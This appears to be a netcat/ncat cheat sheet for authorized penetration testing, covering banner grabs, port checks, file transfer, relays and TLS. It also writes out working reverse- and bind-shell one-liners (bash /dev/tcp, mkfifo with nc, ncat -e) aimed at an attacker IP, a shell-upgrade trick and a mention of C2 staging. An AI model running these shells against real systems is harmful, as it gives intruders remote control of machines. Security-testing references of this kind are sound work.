Netcat Cheat Sheet

TCP/UDP connect, listen, and port relay for banners, shells, and file transfer on authorized networks.

Network & ProtocolncatnetcatpivotshellUpdated 2026-06-02

Overview

Netcat (nc) is the classic network Swiss Army knife: port scans, banner grabs, bind/reverse shells, and file transfer. Ncat (Nmap project) adds SSL, proxy support, and better scripting—prefer ncat when available on authorized engagements.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Install

sudo apt install -y netcat-openbsd ncat

Essential commands

TCP connect banner grab

nc -nv target.example 80

Listen on port

nc -lvnp 4444

Reverse shell listener (attacker)

nc -lvnp 4444

Quick one-liners

Grab a banner from a TCP port

nc -nv target.example 80

Listen for an incoming connection

nc -lvnp 4444

Check if a single port is open

nc -zv -w 2 target.example 443

Send a file to a listening receiver

nc -nv 10.10.14.5 9001 < file.bin

Receive a file on a listener

nc -lvnp 9001 > received.bin

Common workflows

Port scan (simple) —

nc -zv target.example 20-443 2>&1 | grep succeeded

for p in 22 80 443 445 3389; do nc -zv -w 2 target.example $p; done

Attacker

nc -lvnp 4444

Linux target (when payload execution is in scope)

bash -i >& /dev/tcp/10.10.14.5/4444 0>&1

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f

Target

nc -lvnp 4444 -e /bin/bash

Attacker

nc -nv target.example 4444

Receiver

nc -lvnp 9001 > received.bin

Sender

nc -nv 10.10.14.5 9001 < file.bin

Relay (two connections) —

nc -lvnp 8080 -c "nc internal.host 80"

TLS listener

ncat --ssl -lvnp 443

TLS connect

ncat --ssl -v target.example 443

Reverse shell with ncat (attacker)

ncat -lvnp 4444

Target

ncat 10.10.14.5 4444 -e /bin/bash

Allow only your IP

ncat -lvnp 4444 --allow 10.10.14.5

HTTP proxy chain

ncat --proxy http://127.0.0.1:8080 --proxy-type http target.example 80

UDP

ncat -u target.example 53

Flags reference

`-l`	Listen mode
`-v`	Verbose
`-n`	Skip DNS
`-z`	Scan without sending data
`-w SEC`	Timeout
`-p PORT`	Local source port
`-e PROG`	Execute program (bind shell; often disabled on modern nc)
`-u`	UDP
`-k`	Keep listening after disconnect (openbsd nc)
`Flag (ncat)`	Description
`-------------`	-------------
`--ssl`	TLS encryption
`--allow IP`	Allow connection from IP
`--proxy`	Proxy host
`--proxy-type`	http, socks4, socks5
`-e`	Execute command
`--exec`	Persistent handler
`-k`	Accept multiple connections

Tips

OpenBSD nc vs traditional nc flags differ; check nc -h on the box.
Many distros ship nc without -e; use mkfifo bash one-liner or ncat -e.
Upgrade raw shells: python3 -c 'import pty;pty.spawn("/bin/bash")' then Ctrl+Z, stty raw -echo; fg.
For stealth, prefer nmap for scanning; nc for quick single-port checks and C2 staging.

References

https://nmap.org/ncat/doc/